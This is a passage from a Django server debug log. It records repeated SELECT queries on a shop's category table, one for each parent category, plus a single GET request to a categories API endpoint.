"shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:58:45,383 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:58:45,385 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:58:45,387 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:58:45,390 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:58:45,392 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:58:45,394 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:58:45,398 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:58:45,400 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:58:45,403 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:58:45,405 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:58:45,408 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:58:45,412 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:58:45,414 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:58:45,417 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:58:45,420 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:58:45,422 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:58:45,426 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:58:45,429 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:58:45,431 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:58:45,433 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:58:45,436 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:58:45,438 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:58:45,441 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:58:45,444 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:58:45,446 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:58:45,449 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:58:45,451 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:58:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 09:59:11,460 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:59:11,467 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:59:11,471 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:59:11,473 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:59:11,477 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:59:11,479 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:59:11,482 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:59:11,484 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:59:11,486 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:59:11,490 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:59:11,492 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:59:11,494 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:59:11,496 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:59:11,499 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:59:11,502 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:59:11,504 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:59:11,506 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:59:11,509 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:59:11,511 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:59:11,518 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:59:11,522 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:59:11,525 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:59:11,530 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:59:11,533 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:59:11,536 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:59:11,541 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:59:11,544 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:59:11,547 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:59:11,550 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:59:11,552 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:59:11,555 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:59:11,558 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:59:11,560 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:59:11,562 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:59:11,564 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:59:11,568 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:59:11,570 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:59:11,573 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:59:11,575 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:59:11,578 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:59:11,580 utils 4252 140031482124032 